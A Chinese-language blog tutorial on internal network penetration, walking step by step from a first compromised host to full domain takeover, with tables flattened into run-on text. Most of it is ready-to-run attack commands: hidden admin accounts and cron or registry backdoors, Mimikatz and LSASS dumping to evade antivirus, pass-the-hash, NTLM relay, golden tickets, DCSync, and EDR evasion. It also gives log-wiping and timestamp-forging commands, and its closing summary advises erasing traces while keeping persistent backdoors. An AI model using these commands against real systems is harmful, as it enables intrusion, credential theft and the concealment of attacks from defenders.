内网渗透深度实战指南:从单点突破到域控沦陷,手把手拆解横向移动全链路

内网渗透深度实战指南:从单点突破到域控沦陷,手把手拆解横向移动全链路
导语很多渗透测试人员拿到一台服务器的Webshell之后就卡住了——不知道下一步干什么、不知道怎么横向移动、不知道怎么拿下域控。这就是典型的外网渗透高手内网渗透小白。事实上从进入内网到拿下整个域有了一套成熟的技术栈和流程。这篇文章我从实战视角把内网渗透的信息收集、权限维持、横向移动、域渗透、痕迹清理全部讲透。每一步用什么工具、执行什么命令、原理是什么全部给你拆开揉碎。干干货没废话。建议收藏实战前翻一遍。一、内网渗透的核心思维外网渗透拼的是信息收集内网渗透拼的是内功和耐心。外网你面对的是一个“黑盒”需要从零发现入口。而内网一旦进入你就站在了“灰盒”里——内网存在大量脆弱配置、默认密码、未打补丁的系统、域控权限分配混乱。内网渗透的核心三步曲信息收集弄清楚内网长什么样横向移动从一个点跳到另一个点权限提升从普通用户到管理员从管理员到域控二、内网信息收集拿到初始权限后的第一件事你拿到的第一台机器叫跳板机。从这一刻起你所有的操作都在这台机器上执行通过你的C2/Meterpreter/CS Beacon。2.1 本机信息收集知己在跳板机上摸清这是台什么机器谁在用开放了什么命令Windows命令Linux获取信息systeminfouname -a、cat /etc/issue操作系统版本、补丁情况whoamiwhoami、id当前用户权限ipconfig /allifconfig -a、ip aIP地址、子网掩码、DNS、DHCPnetstat -anonetstat -tunlp、ss -tunlp网络连接、监听端口、哪些进程在通信route printroute -n路由表、内网网段arp -aarp -nARP缓存表内网有哪些活跃IPtasklistps aux正在运行的进程net user/net localgroupcat /etc/passwd、getent group用户和组信息wmic service getsystemctl list-units服务列表找脆弱服务netsh advfirewall show allprofilesiptables -L、ufw status防火墙规则重要查看计划任务/定时任务WindowsschtasksLinuxcrontab -l。很多运维喜欢在定时任务里写明文密码2.2 内网拓扑探测知彼核心目标绘制内网地图——有几个网段、有哪些存活主机、开放什么服务、哪台是域控。第一步判断是否在域环境cmd# Windows net config workstation # 看工作站域 net view /domain # 查看所有域 net view /domain:DOMAIN_NAME # 查看域内主机 nltest /dclist:DOMAIN_NAME # 列出所有域控Linux下查看/etc/krb5.conf是否有域配置或者realm list。第二步内网存活主机扫描有了内网IP范围从本机IP和路由表判断用工具扫存活主机和端口。工具fscan国产神器轻量快速fscan.exe -h 192.168.1.0/24自动扫存活端口常见漏洞nmapnmap -sn 192.168.1.0/24Ping扫描或nmap -T4 -F 192.168.1.0/24masscanmasscan 192.168.1.0/24 -p1-65535 --rate10000⚠️ 内网扫描容易被流量监控设备发现。建议慢速扫描-T2或分时段小批量扫描避免触发告警。第三步端口服务识别重点关注端口的意义端口服务内网渗透价值445SMB横向移动的核心入口永恒之蓝、SMB Relay、哈希传递135/139RPC/NetBIOS信息泄露、远程命令执行WMI3389RDP远程桌面可爆破、可会话劫持22SSHLinux横向移动密码爆破、私钥窃取3306/1433/1521/27017数据库数据窃取、提权UDF提权等80/443/8080/8443Web服务Web漏洞挖掘、未授权访问445的SMB也常用于NTLM中继和哈希传递389/636LDAP域内用户查询可泄露域信息53DNSDNS隧道、区域传送漏洞25SMTP邮件伪造、内部钓鱼2.3 域环境信息收集如果你确认在域内下面这些域命令必须背熟很多域渗透靠的就是这组命令cmd# 查看域用户 net user /domain # 查看域管理员 net group Domain Admins /domain # 查看域控 net group Domain Controllers /domain # 查看所有域计算机 net group Domain Computers /domain # 查看域信任关系 nltest /domain_trusts # 查看域时间可用于Kerberos攻击 net time /domain三、权限维持Persistence目标保证你下次还能进来哪怕被管理员重启、清除会话、甚至改了密码。3.1 常用权限维持手段手法适用系统持久化方式计划任务/定时任务Win/Linux定时回连C2创建隐藏账户Winnet user hacker$ pass /add带$隐藏注册表自启动Win写入HKLM\Software\Microsoft\Windows\CurrentVersion\RunWMI持久化Win使用WMI事件订阅触发恶意脚本SSH密钥Linux将公钥写入~/.ssh/authorized_keysCron定时任务Linuxecho * * * * * /path/to/backdoor.sh /etc/crontabMeterpreter/Beacon持久化Win/LinuxMetasploit的persistence模块、CS的elevate四、横向移动Lateral Movement这是内网渗透的核心。从一台机器跳到另一台直到拿下域控。4.1 密码获取与凭证窃取第一步抓取内存中的密码哈希和明文凭证Windows最经典Mimikatzmimikatz.exe privilege::debug sekurlsa::logonpasswords exit抓取系统内存中的明文密码如果启用WDigest和NTLM哈希抓取Kerberos票据可用于Pass the TicketProcdump Mimikatz先procdump -accepteula -ma lsass.exe lsass.dmp再离线用Mimikatz解析绕过杀软对Mimikatz的直接拦截Get-PassHashes.ps1PowerShell脚本Linuxcat /etc/shadow如果能读到直接拿哈希history命令看历史命令有没有输入过密码查看各种配置文件.bash_profile、.bashrc、/etc/profile搜索包含password的文件grep -r password /var/www/ 2/dev/null4.2 哈希传递Pass the Hash, PtH当你拿到Windows用户的NTLM哈希不是明文密码可以通过哈希传递直接认证其他主机无需破解密码工具Mimikatzsekurlsa::pth /user:用户名 /domain:域名 /ntlm:哈希 /run:cmd.exe会弹出一个新的cmd用该用户的权限访问其他机器Impacket套件psexec.py、wmiexec.py、smbexec.py都支持-hashes参数传入哈希示例wmiexec.py domain/usertarget_ip -hashes :NTLM_HASH原理Windows认证中客户端用NTLM哈希加密挑战值发送给服务端。只要哈希正确服务端就认为是合法用户——不需要知道明文密码。4.3 票据传递Pass the Ticket, PtT如果你抓到了Kerberos票据.kirbi文件可以直接用票据访问域内服务。工具Mimikatzkerberos::ptt ticket.kirbiRubeusRubeus.exe ptt /ticket:ticket.kirbi4.4 横向移动常用方法有了凭证密码明文或哈希接下来横向移动手法工具/命令适用场景IPC$连接 计划任务net use \\target\ipc$/schtasks最经典手法需要开放445PsExecPsExec.exe \\target -s cmd远程执行命令需admin权限WMIwmic /node:target process call create cmd.exe /c whoami C:\out.txt无需上传工具纯系统原生WinRMwinrm quickconfigInvoke-Command需要WinRM服务开启5985/5986SMBExecsmbexec.pyImpacket通过SMB上传服务执行命令WMIExecwmiexec.pyImpacket通过WMI执行命令半交互式ShellAtExecatexec.pyImpacket通过计划任务执行老系统兼容SC服务控制sc \\target create ...创建远程服务执行命令实战技巧先用net view看有哪些主机在线再用net use尝试连接如果可以连接\\target\C$默认共享说明拥有管理员权限直接横向横向移动时使用父子进程伪装避免被EDH/EDR告警如ppid欺骗4.5 SMB RelayNTLM中继攻击原理截获一台主机的NTLM认证请求中继转发到另一台主机如域控从而在目标主机上执行命令。工具ResponderImpacket-ntlmrelayxResponder监听内网捕获NTLM挑战响应包ntlmrelayx将捕获到的认证转发到目标机器如域控如果域控开启了SMB签名SMB Signing中继会失败4.6 黄金票据与白银票据黄金票据Golden Ticket拿到域控的krbtgt账户哈希后可以伪造任意用户的TGT授权票据从而获取域内任意权限。前提已经拿到域控权限拿到krbtgt的NTLM哈希和域SID命令Mimikatzkerberos::golden /user:Administrator /domain:test.com /sid:S-1-5-21-... /krbtgt:哈希 /ptt效果伪造出任意用户的TGT可访问域内任何资源甚至域控白银票据Silver Ticket伪造特定服务的TGS服务票据直接访问某个特定服务如CIFS访问文件、LDAP查询。范围比黄金票据小但更难检测因为不依赖于域控。五、域控权限获取终极目标5.1 获取域控权限的常见路径通过NTLM中继到域控用ntlmrelayx将认证流量中继到域控的SMB/LDAP服务直接执行命令或DCSync导出所有哈希通过窃取的域管理员凭证抓取内存或暴力破解域管密码通过Kerberos漏洞如MS14-068、Kerberoasting通过未打补丁的系统漏洞如EternalBlue在域控上的变种5.2 DCSync攻击原理利用域控复制的权限模拟一个域控从另一台域控同步密码哈希。只要有Domain Admins、Enterprise Admins或域控本机的权限即可执行。工具Mimikatzlsadump::dcsync /domain:test.com /user:krbtgt导出krbtgt哈希用于制作黄金票据5.3 域控失陷后的操作Dump所有域用户的哈希lsadump::dcsync /all创建自己的黄金票据保证永久的域控访问权窃取所有GPO策略可能包含各种密码查看域信任关系攻击其他信任域六、痕迹清理避免被溯源渗透测试做完后要清理痕迹如果是红队演习也可以故意留些陷阱诱饵。6.1 Windows痕迹清理清除事件日志wevtutil el列出日志wevtutil cl 安全清除安全日志删除临时文件del /f /s /q %temp%\*清理Mimikatz日志Mimikatz运行会留日志sekurlsa::logoff或删除C:\Windows\Temp下的mimikatz文件清除PowerShell历史Clear-History删除计划任务schtasks /delete /tn TaskName /f清除RDP远程桌面连接记录注册表位置6.2 Linux痕迹清理清除命令历史history -crm -f ~/.bash_history删除日志cat /dev/null /var/log/syslogrm -rf /var/log/apache2/*隐藏文件时间戳用touch -t修改文件修改时间清理SSH登录记录echo ~/.ssh/known_hosts七、内网渗透常用工具全家福类别工具用途信息收集fscan、nmap、masscan内网存活/端口扫描信息收集netview、ldapsearch域内信息收集密码抓取Mimikatz、LaZagne、mimipenguin(Linux)抓取密码和哈希横向移动impacket套件(psexec/wmiexec/smbexec/atexec)远程执行命令横向移动PsExec、sc、wmic、WinRM系统原生横向工具凭证攻击Responder、ntlmrelayxNTLM中继攻击凭证攻击RubeusKerberos票据攻击权限维持Cobalt Strike、MetasploitC2框架持久化控制内网穿透frp、nps、EarthWorm、Chisel代理转发访问内网综合框架Cobalt Strike红队神器、EmpirePowerShell后渗透框架全流程内网渗透八、内网渗透核心逻辑一句话总结第一步跳板机收集本机信息用户、权限、进程、网络、防火墙、补丁第二步探测内网扫描内网存活主机和开放端口绘制拓扑第三步挖凭证抓取当前主机的密码哈希、明文密码、Kerberos票据第四步横向移动用凭证各种手法PtH、PtT、SMBRelay、PsExec跳到下一台主机第五步提权在新主机上提权继续抓凭证反复迭代第六步域控通过DCSync/黄金票据/管理员凭证拿下域控第七步清理擦除操作痕迹保留持久化后门内网渗透的本质是信任关系的连锁崩塌。域内每台主机之间互相信任一旦信任链条的一环失陷整个域都将暴露。 互动话题你在内网渗透中卡得最久的是哪一步信息收集卡住了、横向移动没凭证、还是域控死活拿不下欢迎在评论区分享你的内网渗透翻车经验或高光时刻——真实战场上的教训最值钱。每一条我都会亲自回复硬核拆解。 内网渗透豪华资料包我从实战和培训中整理了一套内网渗透从入门到精通的完整资料适合收藏反复啃①内网渗透完整思维导图PDF矢量图——所有技术点的全景地图②Mimikatz全命令速查表中英文对照含所有模块用途③Impacket套件各脚本详解与实战示例psexec/wmiexec/smbexec/dcomexec等④Cobalt Strike从入门到精通实战教程含Beacon命令、提权、横向、持久化⑤黄金票据/白银票据/DCSync攻击手把手实验环境步骤⑥域环境搭建与内网渗透实验手册VMware搭建完整域环境⑦内网渗透常用工具包fscan、Mimikatz、Impacket、Responder、frp等⑧护网行动内网防守方常见检测点与对抗策略⑨内网渗透面试高频考点100问含详细答案 领取方式评论区回复“内网渗透”我会私信发你全套资料链接。内网渗透拼的不是爆炸性的0day而是耐心与流程。按步骤走每一层都踩实域控只是时间问题。评论区见。